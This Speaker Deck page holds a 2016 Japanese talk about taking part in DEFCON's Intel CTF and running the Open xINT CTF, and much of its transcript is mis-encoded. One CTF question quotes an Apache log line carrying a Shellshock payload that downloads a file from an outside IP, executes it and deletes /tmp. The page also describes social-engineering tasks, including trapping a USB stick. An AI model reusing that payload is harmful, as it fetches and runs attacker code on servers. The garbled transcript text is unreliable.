Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Intel CTF and Open xINT CTF 20161220
Search
Yuho Kameda
December 20, 2016
Technology
1
1.3k
Intel CTF and Open xINT CTF 20161220
OSINTのCTFに参加して開催した話で! 2016/12/20 #ssmjp
Yuho Kameda
December 20, 2016
Tweet
Share
More Decks by Yuho Kameda
See All by Yuho Kameda
How to use OWASP ZAP & Vulnerabilities Slikmap
ykame
0
9.1k
Enjoy Daily Life by handy tool
ykame
0
120
Find Trust-Information -Public- 20170630 #ssmjp
ykame
1
2.5k
Hey Siri! Hello Barbie! ssmjp
ykame
0
940
How to create the alert by script of ZAP
ykame
2
750
[bpstudy] OWASP ZAP Vulnerable Assesment.
ykame
2
1.4k
What is ZAP?
ykame
0
530
MINI Hardening #1.2 20分LT ZAPを使ったHardening対策術 2015/8/29
ykame
2
550
How to install VMwarePlayer and OWASP BWA
ykame
1
1k
Other Decks in Technology
See All in Technology
P2P ではじめる WebRTC のつまづきどころ
tnoho
1
280
恐怖!テストコードなき夜
tsukuboshi
2
110
From Live Coding to Vibe Coding with Firebase Studio
firebasethailand
1
330
alecthomas/kong はいいぞ
fujiwara3
6
1.2k
激動の時代、新卒エンジニアはAIツールにどう向き合うか。 [LayerX Bet AI Day Countdown LT Day1 ツールの選択]
tak848
0
620
2025新卒研修・HTML/CSS #弁護士ドットコム
bengo4com
2
4k
経験がないことを言い訳にしない、 AI時代の他領域への染み出し方
parayama0625
0
280
With Devin -AIの自律とメンバーの自立
kotanin0
2
960
ファインディにおける Dataform ブランチ戦略
hiracky16
0
230
帳票構造化タスクにおけるLLMファインチューニングの性能評価
yosukeyoshida
1
200
Tableau API連携の罠!?脱スプシを夢見たはずが、逆に依存を深めた話
cuebic9bic
2
170
興味の胞子を育て 業務と技術に広がる”きのこ力”
fumiyasac0921
0
450
Featured
See All Featured
4 Signs Your Business is Dying
shpigford
184
22k
Faster Mobile Websites
deanohume
308
31k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
30
2.2k
Building Adaptive Systems
keathley
43
2.7k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
PRO
182
54k
Producing Creativity
orderedlist
PRO
346
40k
Build The Right Thing And Hit Your Dates
maggiecrowley
37
2.8k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
33
2.4k
Building a Modern Day E-commerce SEO Strategy
aleyda
42
7.4k
Why You Should Never Use an ORM
jnunemaker
PRO
58
9.5k
Chrome DevTools: State of the Union 2024 - Debugging React & Beyond
addyosmani
7
770
Bash Introduction
62gerente
613
210k
Transcript
OSINTͷCTFʹ ࢀՃͯ͠։࠵ͨ͠Ͱʂ 2016/12/20 #ssmjp @YuhoKameda ɹɹɹɹɹɹɹɹɹ @pinja_xyz
ࣗݾհ ُా ༐า : ykame (@YuhoKameda) ZAP Evangelist OSINT ओͳۀ༰
WebΞϓϦέʔγϣϯ੬ऑੑஅ ϓϥοτϑΥʔϜ੬ऑੑஅ SOC/CSIRTۀ ۓٸҊ݅ͳΜͰཁһ… ใऩू
ࠓ͢͜ͱ DEFCONͰIntel CTFʹࢀՃͨ͠ AV TokyoͰOpen xINT CTFΛ։࠵ͨ͠
DEFCONͰIntel CTFʹ ࢀՃͨ͠
DEFCONͰIntel CTF DEFCONͬͯͳʔʹʁ ຖՆʹϥεϕΨεͰ։࠵ BlackHatʹଓ͚ͯ։࠵ ༷ʑͳCTFίϯςετ͕͋ΔϋοΧʔ ͷࡇయ
DEFCONͰIntel CTF Intel CTFͬͯͳʔʹʁ 2015͔Β࢝·ͬͨɺIntelligenceʹযΛͯͨ ڝٕ ୈ2ճ(2016)ͷςʔϚɺੈքͷTop50ʹೖΔا ۀͷThreat Intelligence Analystͱͯ͠ɺ߈ܸऀΛ
͍ͯ͘͠աఔͰ༷ʑͳΛճ͢Δ ༏উۚ$2,500 pinjaͰࢀՃʂ(@luminࢯɺ@awamori_ttࢯ + me) ݁Ռ12ҐͰͨ͠
Intel CTFͷ݁Ռ
ͲΜͳ͕͋ͬͨͷʔʁ 1 The Vuln: What is the vulnerability that was
successfully exploited also "known" as? 4ϑΝΠϧܭ508ສߦͷApacheϩάͷத͔ Βɺ߈ܸʹޭͨ͠1ߦΛݟ͚ͭΔ XX.XX.XX.XX - - [21/Jul/2016:02:58:19 -0700] "GET /product/? id=2085 HTTP/1.0" 500 4958 "" "() { : ; }; /bin/bash -c 'wget -O / tmp/a.jpg http://52.37.125.215/ ; curl -o /tmp/a.jpg http:// 52.37.125.215/ ; tar -xzvf /tmp/a.jpg ; chmod 777 /tmp/* ; /tmp/a ; rm -rf /tmp/*'"
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock?
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock? Bashbug? CVE-2014-6271?
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock? Bashbug? CVE-2014-6271? ͑ʮBashdoorʯ
ͦͷଞͷ <Level1> ϚϧΣΞͷ௨৴ઌʁ ߈ܸݩIPͷASN(Autonomous System Number)ʁ ߈ܸݩIP͕ެ։͍ͯ͠ΔWebαʔόͷόʔδϣϯʁ <Level2> ϚϧΣΞͷ໊લʁ ༻͕ແޮԽ͞Ε͍ͯΔ໊ؔʁ
Ϙοτͷ໊લʁ Bot Harder͕༻Δ͢ΔMaildropʁ
ଞʹ͋ΔSocial Engineering CTF(SECTF) ࣮ࡍͷاۀిͯ͠ใࡡऔ͢Δڝٕ Black Badge͑Δۄίϯςετ blog.yka.me Ͱɺ2015ͷใΛupͯ͠·͢ http://blog.yka.me/2015/08/social-engineering-ctfsectf-defcon-23.html
AV TokyoͰOpen xINT CTFΛ ։࠵ͨ͠
AV Tokyoͬͯͳʔʹʁ ηΩϡϦςΟք۾ͷਓ͕ɺू·ͬͯҿΜ ͰɺൃදΛฉ͍ͯҿΜͰɺҿΉ ϋοΧʔίϛϡχςΟ no drink! no hack!
Ԡื·ͰͷྲྀΕ 8/6 20:00 ʮOSINTؔͷCTFຊͰΓ͍ͨͰ͢Ͷʯ ʮձࣾؔͩͱ༰͕… AVTokyoͷCFxͱ͔Ͳ͏Ͱ͠ΐ͏ʯ ʮʒ(8/15)͍ۙͰ͢Ͷɺམͪண͍ͨΒग़͠·͠ΐ͏͔ʯ 8/7 10:00 ɹɹʙ16:00
Intel CTFڝٕࢀՃ 8/8 13:19 writeupΛڞ༗ 8/8 22:26 Call For Xͷจষୟ͖ 8/12 Call For Xఏग़done
࣮ࡍʹ։࠵ͯ͠Έͨ 10/22 15:00 - 19:30 @ौ୩
Open xINT CTFͱʁ http://xintctf.wpblog.jp/ ձͰͷؔऀͷฉ͖ࠐΈSNSͳͲͰඞཁͳใΛऩ ू͠ɺ࣍ʑ໌Β͔ʹͳΔώϯτΛղ͖ͳ͕ΒຊؙʹͨͲΓ ண͘ɺݱͷεύΠཆίϯςετ ࢀՃऀ(εύΠ) ߈ܸऀΛௐࠪ (ผͷεύΠ)
߈ܸऀ(ϋοΧʔ) ৮ USB୳ࡧґཔ USBʹ᠘ΛࠐΜͰ৮ ಠࣗʹௐࠪ
7 1. pinja.xyzͷ։ઃऀ(߈ܸऀ)ͷϝʔϧΞυϨεʁ 2. ߈ܸऀ͕ॴ༗͢ΔFacebookΞΧϯτʁ 3. ߈ܸऀཱ͕ͪدͬͨ(ࣸਅ)ҿ৯ళͷ࠲ඪʁ 4. ߈ܸऀͱҰॹʹ৯ࣄ͍ͯ͠Δਓ(εύΠ)ͷFacebookΞΧϯτ ʁ
5. ͜ͷਓ(εύΠ)Λࣸਅ͔Βಛఆ͠ɺAV TokyoͰ৮ͯ͠ʮ͏· ͘৴༻ͤͯ͞ʯใΛҾ͖ग़ͤ 6. εύΠ͔ΒҾ͖ग़ͨ͠ใΛݩʹɺʮϞϊʯΛݟ͚ͭɺಘΒΕΔ ใΛݟ͚ͭΖ 7. ͦͷϞϊʹ᠘ϦϯΫΛֻ͚ɺʮෆ৹ʹࢥΘΕͳ͍Α͏ʯ߈ܸऀ ʹAV TokyoͰʮϞϊʯΛͤ
͋ΔʮϞϊʯ(USB)Λ୳ͯ͘͠Δ MAMORIOΞϓϦͰԠνΣοΫ http://www.mamorio.jp/ ΞϓϦͰԠͷ͋ͬͨۙΛ୳͢
ৄ͘͠ࢀՃऀͷwriteupΛʂ ΤΫετϦʔϜCTFͭΒ͍ʢOpen xINT ͷWriteup?ʣ http://pinksawtooth.hatenablog.com/ entry/2016/10/24/010049 Open xINT CTF Writeup
http://qiita.com/nicklegr/items/ 5ebcdaac86a21613c94a
ࢀՃऀ : 93ਓ 1Ͱղ͚ͨਓ : 67ਓճ 1: 67ਓɺ2: 49ਓɺ3: 8ਓɺ4:
28ਓɺ5: 7ਓ
࠷ऴతͳ݁Ռʁ (700Ҏ্) [߹ܭ + εύΠಘ + ࠷ऴճ࣌ؒ] Sh1n0g1ɹ900 +ʢ100ʣ18:45:56 tigerszkɹ900
+ʢ100ʣ 19:20:49 rcsirtɹ900 +ʢ0ʣ17:16:36 nicklegrɹ700 +ʢ200ʣ17:39:52 brightblueɹ900 +ʢ0ʣ19:25:33 TomoriNaoɹ700 +ʢ100ʣ17:20:22 tonko2ɹ600 +ʢ100ʣ17:11:11 Sakura Ayaneɹ700 +ʢ0ʣ17:31:46 ໊લ͕ొ໊ͱҰக͠ͳ͍ํεύΠಘ͕0ͱͳΓ·͢ ಉͷ߹ɺ࠷ऴճ͕࣌ؒૣ͍ํ্͕Ґͱ͠·͢